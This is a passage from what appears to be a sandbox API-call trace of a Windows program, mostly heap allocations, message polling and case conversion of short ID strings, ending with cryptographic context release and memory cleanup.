lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.735] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.735] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.736] CryptDestroyKey (hKey=0xaa5920) returned 1 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.736] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.736] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.736] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.736] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.737] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.737] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.737] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.737] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.737] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.737] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.738] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.738] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.738] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.738] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.738] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.738] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.739] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.739] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.739] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.739] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.739] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.739] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0253.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.740] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.740] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.740] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.740] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.741] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.741] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.741] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.741] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.741] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.742] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.742] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.742] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.742] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.742] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.743] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.743] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.743] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.743] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.743] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.743] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.744] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.744] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.744] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.744] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.744] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.744] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.744] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.745] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.745] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0253.745] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.745] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.745] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.745] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.745] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.745] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.745] FreeLibrary (hLibModule=0x74d40000) returned 1 [0253.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.745] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.746] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.746] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.747] CloseHandle (hObject=0x294) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: 